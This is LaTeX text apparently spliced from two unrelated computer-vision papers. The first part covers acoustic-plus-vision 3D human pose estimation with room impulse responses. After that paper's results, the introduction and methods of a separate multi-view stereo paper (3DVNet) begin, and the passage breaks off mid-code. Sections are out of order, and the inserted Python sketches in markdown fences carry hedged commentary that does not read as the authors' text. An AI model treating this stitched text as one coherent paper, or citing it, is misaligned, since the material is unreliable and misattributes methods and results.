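As a concrete sketch, the deconvolution $h = R *^{-1} S$ can be carried out by regularized frequency-domain division (a Wiener-style choice we assume here; the text does not fix the exact deconvolution method). With a single simulated reflector, the recovered impulse response peaks at the reflector's time-of-flight:

```python
import numpy as np

def impulse_response(received, source, eps=1e-6):
    """Estimate h from R = S * h by regularized frequency-domain division."""
    n = len(received) + len(source) - 1
    R = np.fft.rfft(received, n)
    S = np.fft.rfft(source, n)
    H = R * np.conj(S) / (np.abs(S) ** 2 + eps)
    return np.fft.irfft(H, n)

# One ideal reflector: an attenuated echo of the source, delayed by 50 samples.
rng = np.random.default_rng(1)
source = rng.standard_normal(256)
h_true = np.zeros(128)
h_true[50] = 0.8
received = np.convolve(source, h_true)

h_est = impulse_response(received, source)
peak = int(np.argmax(np.abs(h_est)))   # location of the recovered delta
```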
\textbf{Estimating distance in rich multipath indoor environment}:
Let us now move to a more realistic scenario.
In a typical indoor room environment with many echoes, instead of a set of clean delta functions, the impulse response we obtain is a complex time-domain function with many peaks merged together.
Figure \ref{fig:rir}(a) shows a typical room impulse response.
Each of these peaks corresponds to a reflecting surface in the environment, e.g., walls, ceilings, and furniture.
Given the massive number of reflecting surfaces and their complex reflection properties, understanding geometry from this signal would be prohibitively difficult, if not impossible.
However, recall that our goal is to reconstruct human pose, so we are not exactly interested in those room reflections.
What we really need to extract are those human related reflections.
Now, imagine we have two time-domain impulse responses, one with the person present and one without, as shown in Figure \ref{fig:rir}(a) and (b).
If we align them properly and perform a subtraction, the static environmental reflections cancel out, leaving only the human-related reflections, as shown in Figure \ref{fig:rir}(c).
Different peaks in Figure \ref{fig:rir}(c) ideally correspond to reflections from different body parts, and this serves as the physical foundation of this paper.
With the increasing popularity of always-on microphones in today's smart voice assistants, it is easy to scan the room and obtain an accurate empty-room impulse response.
Building on this, we designed our system.
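A minimal sketch of this subtraction, with hand-made synthetic responses (the peak positions and amplitudes are made up for illustration):

```python
import numpy as np

def human_reflections(rir_with_person, rir_empty):
    """Cancel static environment reflections by subtracting the empty-room RIR."""
    n = min(len(rir_with_person), len(rir_empty))
    return rir_with_person[:n] - rir_empty[:n]

rir_empty = np.zeros(400)
rir_empty[[60, 150, 290]] = [1.0, 0.6, 0.3]   # walls, ceiling, furniture
rir_person = rir_empty.copy()
rir_person[[95, 110]] = [0.25, 0.18]          # echoes from body parts

diff = human_reflections(rir_person, rir_empty)
# Only the human-related peaks at samples 95 and 110 survive.
```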
\begin{figure}[hbt]
\centering
\vspace{-0.05in}
\includegraphics[width=\linewidth]{dummy.pdf}
\vspace{-0.25in}
\caption{Room impulse responses measured with and without the person present ((a) and (b)), and their difference (c), which isolates the human-related reflections.}
\label{fig:rir}
\vspace{-0.05in}
\end{figure}
\subsection{Data encoding}
To make our model as general as possible,
we adopt a physics-based approach to model how signals propagate,
since both audio and vision follow well-understood propagation physics.
Based on this propagation model, we directly regress the 3D pose in 3D space.
Let us start with audio data encoding.
\\
\textbf{Audio data encoding:}
Recall that we already have the one-dimensional impulse response (after subtracting the empty-room response); the next task is to connect it with 3D geometry.
Note that the speaker and microphone we use do not offer bearing information: any point in 3D space at the same distance to the speaker/mic pair produces exactly the same response.
This motivates a polar-coordinate-based 3D encoding.
Assume the sensor's location is denoted $(x_0,y_0,z_0)$ in the global frame.
Then for any given location $P(x,y,z)$, the response equals $RIR(\|(x_0,y_0,z_0)-(x,y,z)\|)$.\\
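A sketch of this encoding, assuming a co-located speaker/mic pair at the origin; the grid resolution, sampling rate, and speed of sound below are illustrative choices, not values from the paper:

```python
import numpy as np

def encode_rir_to_volume(rir, sensor_xyz, grid, fs=48000, c=343.0):
    """Fill each voxel with RIR(distance to sensor): range only, no bearing."""
    dist = np.linalg.norm(grid - np.asarray(sensor_xyz), axis=-1)   # meters
    idx = np.clip(np.round(dist / c * fs).astype(int), 0, len(rir) - 1)
    return rir[idx]

# A 4 m cube sampled every 0.25 m, sensor at the origin corner.
axis = np.arange(0.0, 4.0, 0.25)
gx, gy, gz = np.meshgrid(axis, axis, axis, indexing="ij")
grid = np.stack([gx, gy, gz], axis=-1)

rir = np.zeros(2048)
rir[int(round(2.0 / 343.0 * 48000))] = 1.0    # single echo at 2 m range
vol = encode_rir_to_volume(rir, (0.0, 0.0, 0.0), grid)
```

Every voxel on the 2 m sphere around the sensor receives the echo's value, which is exactly the range-only ambiguity described above.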
\textbf{Vision data encoding:}
Vision data is encoded similarly, based on a propagation model.
The major difference, however, is that a vision ray is directional but offers no timing information.
We expect a fusion of audio and vision to provide both bearing and depth, and thus a 3D human pose.
Recall that each pixel of a 2D image corresponds to one ray in 3D space.
We use OpenPose \cite{} to obtain the 2D locations of 15 joints on the human body.
These 15 2D joint locations are then back-projected into 3D space to form 15 rays.
Any point on each of these rays is a possible 3D joint location.
For the purpose of data smoothing, we use a Gaussian representation of the ray to create a 3D heatmap.\\
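A sketch of the ray heatmap for a single joint, assuming a pinhole camera at the origin; the intrinsics, grid, and Gaussian width below are illustrative assumptions:

```python
import numpy as np

def ray_heatmap(pixel_uv, K, grid, sigma=0.1):
    """Gaussian heatmap over voxels by distance to the joint's viewing ray."""
    d = np.linalg.solve(K, np.array([pixel_uv[0], pixel_uv[1], 1.0]))
    d = d / np.linalg.norm(d)                    # ray direction, camera at 0
    proj = np.maximum(grid @ d, 0.0)             # no points behind the camera
    closest = proj[..., None] * d                # nearest ray point per voxel
    dist = np.linalg.norm(grid - closest, axis=-1)
    return np.exp(-dist ** 2 / (2 * sigma ** 2))

K = np.array([[500.0, 0.0, 320.0],
              [0.0, 500.0, 240.0],
              [0.0, 0.0, 1.0]])
axis = np.linspace(-1.0, 1.0, 21)
gx, gy, gz = np.meshgrid(axis, axis, axis, indexing="ij")
grid = np.stack([gx, gy, gz], axis=-1)

# A joint detected at the principal point back-projects to the +z axis.
hm = ray_heatmap((320.0, 240.0), K, grid)
```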
\textbf{Groundtruth encoding:}
Similar to Convolutional Pose Machines \cite{}, we encode each joint label as a 3D Gaussian distribution centered at the groundtruth joint location in 3D space.
Finally, a 3D CNN is trained to regress from the vision ray and audio RIR heatmaps to each joint location.
\subsection{Network architecture}
We use 3D convolution layers as the basic building block of our network.
The input consists of 4 audio heatmap channels and 15 vision ray heatmap channels, and the output is 15 channels of joint heatmaps.
Considering the high dimensionality of our data, the network is composed of multiple blocks.
The output of each block is compared with the groundtruth to obtain an L2 loss, and we add shortcut connections to avoid the potential gradient vanishing problem.
The network is trained to minimize the sum of all L2 losses.
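A hedged PyTorch sketch of this architecture; the channel counts follow the text, but the block depth, widths, and other hyperparameters are assumptions:

```python
import torch
import torch.nn as nn

class PoseBlock(nn.Module):
    """One 3D-conv stage with a residual shortcut and a heatmap head."""
    def __init__(self, ch, n_joints=15):
        super().__init__()
        self.body = nn.Sequential(
            nn.Conv3d(ch, ch, 3, padding=1), nn.ReLU(),
            nn.Conv3d(ch, ch, 3, padding=1),
        )
        self.head = nn.Conv3d(ch, n_joints, 1)

    def forward(self, x):
        x = torch.relu(x + self.body(x))   # shortcut vs. vanishing gradients
        return x, self.head(x)

class PoseNet3D(nn.Module):
    """Stacked blocks; every intermediate heatmap is supervised with L2."""
    def __init__(self, ch=16, n_blocks=2):
        super().__init__()
        self.stem = nn.Conv3d(4 + 15, ch, 3, padding=1)  # audio + vision rays
        self.blocks = nn.ModuleList(PoseBlock(ch) for _ in range(n_blocks))

    def forward(self, x):
        x = self.stem(x)
        heatmaps = []
        for block in self.blocks:
            x, hm = block(x)
            heatmaps.append(hm)
        return heatmaps

net = PoseNet3D()
outs = net(torch.randn(1, 19, 8, 8, 8))
gt = torch.randn(1, 15, 8, 8, 8)
loss = sum(((o - gt) ** 2).mean() for o in outs)  # sum of all L2 losses
```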
\section{Related work}
This paper is primarily concerned with integrating information from audio signals with single view 3D pose estimation to obtain metric scale. We briefly review the related work in these domains.
\noindent\textbf{Vision based Lifting} While reconstructing 3D pose (a set of body landmarks) from a 2D image is geometrically ill-posed, the spatial relationship between landmarks provides a geometric cue to reconstruct the 3D pose~\cite{cjtaylor}. This relationship can be learned from datasets that include 2D and 3D correspondences such as Human3.6M~\cite{ionescu2013human36m}, MPI-INF-3DHP~\cite{mono-3dhp2017} (multiview), Surreal~\cite{varol17_surreal} (synthetic), and 3DPW~\cite{vonMarcard2018} (external sensors). Given the 3D supervision, the spatial relationship can be directly learned via supervised learning~\cite{tome, sun2018,habibie,chang}. Various representations have been proposed to effectively encode the spatial relationship such as volumetric representation~\cite{pavlakos}, graph structure~\cite{cai19,zhao19,ci19,xu21}, transformer architecture~\cite{yushuke,llopart,li21}, compact designs for realtime reconstruction~\cite{vneck,xneck}, and inverse kinematics~\cite{li_cvpr21}. These supervised learning approaches that rely on the 3D ground truth supervision, however, show limited generalization to images of out-of-distribution scenes and poses due to the domain gap. Weakly supervised, self-supervised, and unsupervised learning have been used to address this challenge. For instance, human poses in videos are expected to move and deform continuously over time, leading to a temporal self-supervision~\cite{hossain}. A dilated convolution that increases temporal receptive fields is used to learn the temporal smoothness~\cite{pavllo,Tripathi20}, a global optimization is used to reconstruct temporally coherent pose and camera poses~\cite{arnab19}, and spatio-temporal graph convolution is used to capture pose and time dependency~\cite{cai19, yu20,liu20}. Multiview images provide a geometric constraint that allows learning view-invariant visual features to reconstruct 3D pose. 
The predicted 3D pose can be projected onto other view images~\cite{rhodin18, rhodin_eccv18,wendt}, stereo images are used to triangulate a 3D pose which can be used for 3D pseudo ground truth for other views~\cite{kocabas,iskakov, iqbal}, and epipolar geometry is used to learn 2D view invariant features for reconstruction~\cite{he20,yao19}. Adversarial learning enables decoupling the 3D poses and 2D images, i.e., 3D reconstruction from a 2D image must follow the distribution of 3D poses, which allows learning from diverse images (not necessarily videos or multiview)~\cite{chen,kudo,wandt19}. A characterization and differentiable augmentation of datasets, further, improves the generalization~\cite{gong, wang20}. With a few exceptions, despite remarkable performance, the reconstructed poses lack the metric scale because of the fundamental ambiguity of 3D pose estimation. Our approach leverages sound generated by consumer-grade speakers to lift the pose in 3D with physical scale.
\noindent\textbf{Multimodal Reconstruction}
Different modalities have been exploited for 3D sensing and reconstruction, including RF-based \cite{rfpose,rfavatar,wipose,jin2018towards,guan2020through}, inertial-based \cite{shen2016smartwatch,yang2020ear}, and acoustic-based \cite{yun2015turning,fan2021aurasense, fan2020acoustic,christensen2020batvision,wilson2021echo,senocak2018learning,chen2020soundspaces} approaches.
Various applications, including self-driving cars \cite{guan2020through}, robot manipulation and grasping \cite{wang2016robot, wang2019multimodal, watkins2019multi, nadon2018multi}, and simultaneous localization and mapping (SLAM) \cite{terblanche2021multimodal, doherty2019multimodal, akilan2020multimodality, singhal2016multi, sengupta2019dnn}, have benefited from multimodal reconstruction.
Audio, given its ambient nature, has attracted unique attention in multimodal machine learning \cite{liu2018towards,rodriguez2018methodology, ngiam2011multimodal,ghaleb2019metric, burnsmulti, mroueh2015deep}.
However, few works \cite{yun2015turning,christensen2020batvision,wilson2021echo} address multimodal geometry understanding using audio as a modality, because heavy audio multipath poses various difficulties for 3D understanding.
Human pose, given its diverse nature, is especially challenging for traditional acoustic sensing and is thus sparsely studied.
While similar signals such as WiFi and FMCW radio have been used for human pose estimation \cite{rfpose,rfavatar,wipose}, audio signals, given their lower propagation speed, offer more accurate distance measurements than RF-based approaches.
We address the challenge of audio multipath and uncover the potential of audio for accurate metric scale 3D human pose estimation. Specifically, we present the first method that combines audio signals with 2D pose detection to reason about the 3D spatial relationship for metric reconstruction. Our approach is likely to benefit various applications, including smart homes, AR/VR, and robotics.
\section{Results}
We evaluate our method on the PoseKernel dataset by comparing with state-of-the-art and baseline algorithms.
\noindent\textbf{Evaluation Metric} We use the mean per joint position error (MPJPE) and the percentage of correct keypoints (PCK) in 3D as the main evaluation metrics. For PCK, we report PCK@$t$, where $t$ is the error tolerance in cm.
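Both metrics are straightforward to compute; a minimal sketch with joint coordinates in cm and the 15-joint skeleton used in this paper:

```python
import numpy as np

def mpjpe(pred, gt):
    """Mean per joint position error, in the units of the input (cm here)."""
    return float(np.mean(np.linalg.norm(pred - gt, axis=-1)))

def pck(pred, gt, t):
    """Percentage of joints with position error below tolerance t."""
    return float(np.mean(np.linalg.norm(pred - gt, axis=-1) < t) * 100.0)

gt = np.zeros((15, 3))                 # 15 joints, cm
pred = gt.copy()
pred[:5, 0] = 10.0                     # five joints are off by 10 cm
err = mpjpe(pred, gt)                  # (5 * 10 + 10 * 0) / 15 cm
pct = pck(pred, gt, 5.0)               # 10 of 15 joints within 5 cm
```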
\noindent\textbf{Baseline Algorithms} Two state-of-the-art baseline algorithms are used. (1) Lifting from the Deep, or \texttt{Vis.:LfD}~\cite{tome} is a vision based algorithm that regresses the 3D pose from a single view image by learning 2D and 3D joint locations
together. To resolve the depth ambiguity, a statistical model is learned to generate a plausible 3D reconstruction. This algorithm predicts the 3D pose directly, and we apply Procrustes analysis to align it with the image projection. (2) FrankMocap (\texttt{Vis.:FrankMocap}~\cite{rong2021frankmocap}) leverages pseudo ground truth 3D poses on in-the-wild images obtained by EFT~\cite{joo2020eft}. Augmenting 3D supervision improves the performance of 3D pose reconstruction. This algorithm predicts the shape and pose using the SMPL parametric mesh model~\cite{SMPL:2015}. None of the existing single-view reconstruction approaches, including these baseline methods, produces metric scale reconstructions.
Given their 3D reconstructions, we scale them to metric scale using the average human height in our dataset (1.7 m).
\noindent\textbf{Our Ablated Algorithms} In addition to the state-of-the-art vision based algorithms, we compare our method by ablating our sensing modalities.
(1) \texttt{Audio$\times$4} uses four audio signals to reconstruct the 3D joint locations to study the impact of the 2D visual information. (2) \texttt{Vis.+Audio$\times$2} uses a single view image and two audio sources to predict the 3D joint location in the 3D voxel space. (3) \texttt{Ours} is equivalent to Vision+Audio$\times$4.
\subsection{PoseKernelLifter Evaluation}
\begin{figure*}[t]
\centering
\includegraphics[width=\linewidth]{qual1.pdf}
\caption{Qualitative results. We test our pose kernel lifting approach in diverse environments including (a) basement, (b) living room, (c) laboratory, etc. The participants are asked to perform daily activities such as sitting, squatting, and range of motion. (d): A failure case of our method: severe occlusion.}
\label{fig:result_vis}
\vspace{-0.05in}
\end{figure*}
\vspace{-0.05in}
Among the six environments in the PoseKernel dataset, we use four environments for training and two for testing. The training data consists of diverse poses performed by six
adults (whose heights range between 155 cm and 180 cm) and two minors (with heights of 140 cm and 150 cm). The testing data includes two adult participants and one minor participant, whose heights range between 140 cm and 180 cm.
\noindent\textbf{Comparison} We measure the reconstruction accuracy using the MPJPE metric, summarized in Table~\ref{mpjpe}. As expected, state-of-the-art vision based lifting approaches (\texttt{Vis.:LfD} and \texttt{Vis.:Frank}) that predict 3D human pose in a scale-free space are sensitive to the heights of the subjects, resulting in 18 $\sim$ 40 cm mean error for adults and 40 $\sim$ 60 cm for minors, i.e., the error is larger for minor participants because their heights differ greatly from the average height of 1.7 m. \texttt{Vis.:Frank} outperforms \texttt{Vis.:LfD} because it uses larger training data and thus estimates poses more accurately. Nonetheless, our pose kernel, designed for metric scale reconstruction, significantly outperforms these approaches, and its performance does not depend on the heights of the participants. In fact, it produces around 20\% smaller error for minor participants than for the adult participants because of their smaller scale. Similar observations can be made for PCK, summarized in Table~\ref{pck}.
\noindent\textbf{Ablation Study} We ablate the sensing components of our pose kernel approach. As summarized in Tables~\ref{mpjpe} and \ref{pck}, the 3D metric lifting leverages the strong cues from visual data. Without the visual cue, i.e., \texttt{Audio$\times$4}, the reconstruction is highly erroneous, while combining the image with audio as a complementary signal (\texttt{Vis.+Audio$\times$2} and \texttt{Ours}) significantly improves the accuracy.
While providing metric information, reconstructing the 3D human pose from audio signals alone (\texttt{Audio$\times$4}) is very challenging because the signals are (1) non-directional: a received signal is an integration of audio signals over all angles around the microphone, which, unlike visual data, does not provide a bearing angle; (2) non-identifiable: the reflected audio signals are not associated with any semantic information, e.g., hand, arm, and head, so it is difficult to tell where a specific reflection comes from; and (3) slow: due to the requirement of linear frequency sweeping (10 Hz), the received signals are blurred in the presence of body motion, which is equivalent to an extremely blurry image created by a 100 ms exposure with a rolling shutter. Nonetheless, augmenting with audio signals improves 3D metric reconstruction regardless of the heights of the participants.
\noindent\textbf{Generalization} We report results in completely different testing environments, which demonstrate the strong generalization ability of our method. For each environment, the spatial arrangement of the camera and microphones/speakers is different, depending on the space configuration. Figure \ref{fig:result_vis} visualizes the qualitative results of our 3D pose lifting method, where we successfully recover the metric scale 3D pose in different environments. We also include a failure case in the presence of severe occlusion, as shown in Figure \ref{fig:result_vis}(d).
\section{Introduction}
\begin{figure}
\begin{center}
\includegraphics[width=\columnwidth]{figures/diffs.jpg}
\end{center}
\vspace{-0.6cm}
\begin{small}
\caption{Volumetric methods lack local detail while depth-based methods lack global coherence. Our method cyclically predicts depth, back-projects into 3D space, volumetrically models geometry, and updates all depth predictions to match, resulting in local detail \textit{and} global coherence.}
\label{fig:diffs}
\end{small}
\end{figure}
\blfootnote{\url{https://github.com/alexrich021/3dvnet}}Multi-view stereo (MVS) is a central problem in computer vision with applications from augmented reality to autonomous navigation.
In MVS, the goal is to reconstruct a scene using only posed RGB images as input.
This reconstruction can take many forms, from voxelized occupancy or truncated signed distance fields (TSDFs), to per-frame depth prediction, the focus of this paper.
In recent years, MVS methods based on deep learning \cite{chen2019ptmvs, duzceker2020dvmvs, hou2019gpmvs, im2019dps, luo2019pmvs, murez2020atlas, sinha2020deltas, sun2021neucon, mvdepthnet, yao2018mvs, yao2019rmvs, yi2020pyramid, yu2020fmvs} have surpassed traditional MVS methods \cite{galliani2015gaupuma, schoenberger2016mvs} on numerous benchmark datasets \cite{dai2017scannet, jensen2014large, knapitsch2017tanks}.
In this work, we consider these methods as falling into two categories, depth estimation and volumetric reconstruction, each with advantages and disadvantages.
The most recent learning methods in depth estimation use deep features to perform dense multi-view matching robust to large environmental lighting changes and textureless or specular surfaces, among other things.
These methods take advantage of well researched multi-view aggregation techniques and the flexibility of depth as an output modality.
They formulate explicit multi-view matching costs and include iterative refinement layers in which a network predicts a small depth offset between an initial prediction and the ground truth depth map \cite{chen2019ptmvs, yu2020fmvs}.
While these techniques have been successful for depth prediction, most are constrained to making independent, per-frame predictions.
This results in predictions that do not agree on the underlying 3D geometry of the scene.
Those that do make joint predictions across multiple frames use either regularization constraints \cite{hou2019gpmvs} or recurrent neural networks (RNNs) \cite{duzceker2020dvmvs} to encourage frames close in pose space to make similar predictions.
However, these methods do not directly operate on a unified 3D scene representation, and their resulting reconstructions lack global coherence (see Fig.~\ref{fig:diffs}).
Meanwhile, volumetric techniques operate directly on a unified 3D scene representation by back-projecting and aggregating 2D features into a 3D voxel grid and using a 3D convolutional neural network (CNN) to regress a voxelized parameter, often a TSDF.
These methods benefit from the use of 3D CNNs and naturally produce highly coherent 3D reconstructions and accurate depth predictions.
However, they do not explicitly formulate a multi-view matching cost like depth-based methods, generally averaging deep features from different views to populate the 3D voxel grid.
This results in overly-smooth output meshes (see Fig.~\ref{fig:diffs}).
In this paper, we propose \textit{3DVNet}, an end-to-end differentiable method for learned multi-view depth prediction that leverages the advantages of both volumetric scene modeling and depth-based multi-view matching and refinement.
The key idea behind our method is the use of a 3D scene-modeling network which outputs a multi-scale volumetric encoding of the scene.
This encoding is used with a modified PointFlow algorithm \cite{chen2019ptmvs} to iteratively update a set of initial coarse depth predictions, resulting in predictions that agree on the underlying scene geometry.
Our 3D network operates on all depth predictions at once, and extracts meaningful, scene-level priors similar to volumetric MVS methods.
However, the 3D network operates on features aggregated using depth-based multi-view matching and can be used iteratively to update depth maps.
In this way, we combine the advantages of the two separate classes of techniques.
Because of this, 3DVNet exceeds state-of-the-art results on ScanNet \cite{dai2017scannet} in nearly all depth map prediction \textit{and} 3D reconstruction metrics when compared with the current best depth and volumetric baselines.
Furthermore, we show our method generalizes to other real and synthetic datasets \cite{handa2014icl-nuim, sturm2012tum-rgbd}, again exceeding the best results on nearly all metrics.
Our contributions are as follows:
\begin{enumerate}
\item We present a 3D scene-modeling network which outputs a volumetric scene encoding, and show its effectiveness for iterative depth residual prediction.
\item We modify PointFlow~\cite{chen2019ptmvs}, an existing method for depth map residual predictions, to use our volumetric scene encoding.
\item We design 3DVNet, a full MVS pipeline, using our 3D scene-modeling network and PointFlow refinement.
\end{enumerate}
\section{Related Works}
We cover MVS methods using deep learning, categorizing them as either depth-prediction methods or volumetric methods.
Our method falls into the first category, but is very much inspired by volumetric techniques.
\textbf{Depth-Prediction MVS Methods:} With some notable exceptions \cite{sinha2020deltas, yang2021mvs2d}, nearly all depth-prediction methods follow a similar paradigm: (1) they construct a plane sweep cost volume on a reference image's camera frustum, (2) they fill the volume with deep features using a cost function that operates on source and reference image features, (3)~they use a network to predict depth from this cost volume.
Most methods differ in their cost metric used to construct the volume.
Many cost metrics exist, including per-channel variance of deep features \cite{yao2018mvs, yao2019rmvs}, learned aggregation using a network \cite{luo2019pmvs, yi2020pyramid}, concatenation of deep features \cite{im2019dps}, the dot product of deep features \cite{duzceker2020dvmvs}, and absolute intensity difference of raw image RGB values \cite{hou2019gpmvs, mvdepthnet}.
We find per-channel variance \cite{yao2018mvs} to be the most commonly used cost metric, and adopt it in our system.
The choice of cost aggregation method results in either a vectorized matching cost and thus a 4D cost volume \cite{chen2019ptmvs, im2019dps, luo2019pmvs, yao2018mvs, yao2019rmvs, yi2020pyramid, yu2020fmvs} or a scalar matching cost and thus a 3D cost volume \cite{duzceker2020dvmvs, hou2019gpmvs, mvdepthnet}.
Methods with 4D cost volumes generally require 3D networks for processing, while 3D cost volumes can be processed with a 2D U-Net-style \cite{ronneberger2015unet} encoder-decoder architecture.
Some methods operate on the deep features at the bottleneck of this U-Net to make joint depth predictions for all $N$ frames or a subset of frames in a given scene.
This is similar to our proposed method, and we highlight the differences.
GPMVS \cite{hou2019gpmvs} uses a Gaussian Process (GP) constraint conditioned on pose distance to regularize these deep features.
This GP constraint only operates on deep features and assumes Gaussian priors.
In contrast, we directly \textit{learn} priors from predicted depth maps and explicitly predict depth residuals to modify depth maps to match.
DV-MVS \cite{duzceker2020dvmvs} introduces an RNN to propagate information from the deep features in frame $t - 1$ to frame $t$ given an ordered sequence of frames.
While they do propagate this information in a geometrically plausible way, the RNN operates only on deep features similar to GPMVS.
Furthermore, the RNN never considers all frames jointly like our method.
Similar to our method, some networks iteratively predict a residual to refine an initial depth prediction \cite{chen2019ptmvs, yu2020fmvs}.
We specifically highlight Point-MVSNet \cite{chen2019ptmvs}, which introduces PointFlow, a point cloud learning method for residual prediction.
Our method is very much inspired by this work. We briefly describe the differences.
In their work, they operate on a point cloud back-projected from a \textit{single} depth map and augmented with additional points.
Features are extracted from this point cloud using point cloud learning techniques and used in their PointFlow module for residual prediction.
Crucially, these features do not come from a unified 3D representation of the scene.
Thus the residual prediction is only conditioned on information local to the individual depth prediction and not global scene information.
In contrast, our variation of PointFlow uses our volumetric scene model to condition residual prediction on information from \textit{all} depth maps.
For an in-depth discussion of the differences, see Sec.~\ref{sec:refinement}.
\textbf{Volumetric MVS Methods:} In volumetric MVS, the goal is to directly regress a global volumetric representation of the scene, generally a TSDF volume.
We highlight two methods which inspired our work.
Atlas \cite{murez2020atlas} back-projects rays of deep features extracted from images into a global voxel grid, pools features from multiple views using a running average, then directly regresses a TSDF in a coarse-to-fine fashion using a 3D U-Net.
NeuralRecon~\cite{sun2021neucon} improves on the memory consumption and run-time of Atlas by reconstructing local fragments using the most recent keyframes, then fusing the local fragments to a global volume using an RNN.
The reconstructions these methods produce are pleasing.
However, both construct feature volumes using averaging in a single forward pass, which we believe is non-optimal.
In contrast, our depth-based method allows us to construct a feature volume using multi-view matching features and perform iterative refinement.
\begin{figure*}[h]
\begin{center}
\includegraphics[width=0.9\linewidth]{figures/3D_refinement.jpg}
\end{center}
\vspace{-0.6cm}
\caption{Our novel 3D scene modeling and refinement method first constructs a multi-scale volumetric scene encoding from a set of $N$ input depth maps with corresponding feature maps. It then uses that encoding in a variation of the PointFlow algorithm~\cite{chen2019ptmvs} to predict a residual for each of the $N$ depth maps. The full method can be run in a nested for-loop fashion, predicting multiple residuals per depth map in the inner loop and running scene modeling in the outer loop.}
\label{fig:main}
\end{figure*}
\section{Methods}
Our method takes as input $N$ images, denoted $\{\vect{I}_n\}$, $n=1, \dots, N$ with corresponding known extrinsic and intrinsic camera parameters.
Our goal is to predict $N$ depth maps $\{\vect{D}_n\}$ corresponding to the $N$ images.
As a pre-processing step, we define for every image $\vect{I}_n$ a set of $M$ indices $\{s_1, \dots, s_M\}$ pointing to which images to use as source images for depth prediction,
and append the reference index to form the set $\vect{S}_n = \{n, s_1, \dots, s_M\}$.
Our pipeline is as follows.
First, a small depth-prediction network is used to independently predict initial coarse depth maps $\{\vect{D}_n^0\}$ for every frame $\{\vect{I}_n\}$ using extracted image features $\{\vect{F}_n\}$ (Sec.~\ref{sec:3dvnet}).
Second, we back-project our $N$ initial depth maps to form a joint point cloud \mbox{$\vect{X} \subset \mathbb{R}^3$} (Sec~\ref{sec:3d-network}).
Because each point $\vect{p} \in \vect{X}$ is associated with one depth map $\vect{D}_n^{0}$ that has associated feature maps \mbox{$\{\vect{F}_s : s \in \vect{S}_n\}$}, we can augment it with a multi-view matching feature aggregated from those feature maps.
Third, our 3D scene-modeling network takes as input this feature-rich point cloud and outputs a multi-scale scene encoding $\vect{V}_1, \vect{V}_2, \vect{V}_3$ (Sec.~\ref{sec:3d-network}).
Fourth, we update each depth map to match this scene encoding using a modified PointFlow algorithm, resulting in highly coherent depth maps and thus highly coherent reconstructions (Sec.~\ref{sec:refinement}).
Steps 2-4 can be run in a nested for-loop, with steps 2 and 3 run in the outer loop to generate updated scene models with the current depth maps and step 4 run in the inner loop to refine depth maps with the current scene model.
We denote the updated depth map after $l_o$ outer loop iterations of scene modeling and $l_i$ inner loop iterations of updating as $\vect{D}_n^{(l_o, l_i)}$.
Finally, we upsample the resulting refined depth maps to the size of the original image in a coarse-to-fine manner, guided by deep features and the original image, to arrive at final predictions $\{\vect{D}_n\}$ for every image $\{\vect{I}_n\}$ (Sec.~\ref{sec:3dvnet}).
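The nested-loop structure of steps 2--4 can be sketched as follows; all helpers are toy scalar stand-ins (the real versions are the networks described below), and the toy only illustrates how the inner updates pull all depth predictions into agreement with the scene model:

```python
def reconstruct(images, n_outer=2, n_inner=2):
    """Steps 1-4 as a nested loop: model the scene, then refine all depths."""
    feats = [extract_features(im) for im in images]
    depths = [predict_coarse_depth(f) for f in feats]
    for _ in range(n_outer):                    # outer: rebuild scene model
        cloud = back_project(depths, feats)
        encoding = scene_model(cloud)           # volumetric scene encoding
        for _ in range(n_inner):                # inner: PointFlow updates
            depths = [d + point_flow_residual(d, encoding) for d in depths]
    return [upsample(d, im) for d, im in zip(depths, images)]

# Toy scalar stand-ins so the control flow runs end to end.
extract_features = lambda im: im
predict_coarse_depth = lambda f: 0.9 * f
back_project = lambda depths, feats: list(zip(depths, feats))
scene_model = lambda cloud: sum(d for d, _ in cloud) / len(cloud)
point_flow_residual = lambda d, enc: 0.5 * (enc - d)  # pull toward the model
upsample = lambda d, im: d

final = reconstruct([1.0, 2.0, 3.0])
```

In the toy, the initially disagreeing "depth maps" converge toward a common value, mirroring how the refinement drives all $N$ depth maps toward a coherent reconstruction.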
\subsection{3D Scene Modeling} \label{sec:3d-network}
A visualization of our 3D scene modeling method is given in the upper half of Fig.~\ref{fig:main}.
As stated previously, our 3D scene-modeling network operates on a feature rich point cloud back-projected from $\{\vect{D}_n^0\}$ or subsequent updated depth maps.
To process this point cloud, we adopt a voxelize-then-extract approach.
We first generate a sparse 3D grid of voxels, culling voxels that do not contain depth points.
To avoid losing granular information of the point cloud, we generate a deep feature for each voxel using a per-voxel PointNet \cite{qi2017pointnet}.
The PointNet inputs are the features of each depth point in the voxel as well as the 3D offset of that point to the voxel center.
Finally, we run a 3D U-Net~\cite{ronneberger2015unet} on the resulting voxelized feature volume and extract intermediate outputs at multiple resolutions.
By nature of construction, this U-Net learns meaningful, scene-level priors.
The result is a multi-scale, volumetric scene encoding.
\textbf{Point Cloud Formation:} We form our point cloud $\vect{X}~\subset~\mathbb{R}^3$ by back-projecting all depth pixels in all $N$ depth maps.
For our multi-view matching feature associated with each point $\vect{p} \in \vect{X}$, we follow existing work \cite{chen2019ptmvs, yao2018mvs} and use per-channel variance aggregation using the reference and source feature maps associated with each depth pixel.
For $\vect{p}~\in~\vect{X}$, given that $\vect{p}$ belongs to depth map $\vect{D}_n^0$, the equation for variance feature $\boldsymbol{\sigma}^2(\vect{p})$, applied per-channel, is:
\begin{equation}\label{eq:var}
\boldsymbol{\sigma}^2(\vect{p}) = \frac{1}{|\vect{S}_n|}\sum_{s \in \vect{S}_n} \left(\vect{F}_{s}(\vect{\hat{p}}_s) - \overline{\vect{F}_{*}(\vect{\hat{p}}_*)}\right)^2
\end{equation}
where $\vect{\hat{p}}_s$ is the projection of $\vect{p}$ to feature map $\vect{F}_s$, $\vect{F}_s(\vect{\hat{p}}_s)$ is the bilinear interpolation of $\vect{F}_s$ to point $\vect{\hat{p}}_s$, and $\overline{\vect{F}_{*}(\vect{\hat{p}}_*)}$ is the average interpolated feature over all indices $s \in \vect{S}_n$.
Intuitively, if $\vect{p}$ lies on a surface it is more likely to have low variance in most feature channels in $\boldsymbol{\sigma}^2(\vect{p})$ while if it doesn't lie on a surface the variance will likely be high.
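A sketch of this variance feature for a single point $\vect{p}$, with the bilinearly interpolated features already stacked as a (views, channels) array; the toy inputs contrast an on-surface point (views agree) with an off-surface point (views disagree):

```python
import numpy as np

def variance_feature(interp_feats):
    """Per-channel variance across reference + source views (one 3D point)."""
    return np.mean((interp_feats - interp_feats.mean(axis=0)) ** 2, axis=0)

views, channels = 4, 8                          # |S_n| = 4 views
on_surface = np.ones((views, channels))          # all views see the same feature
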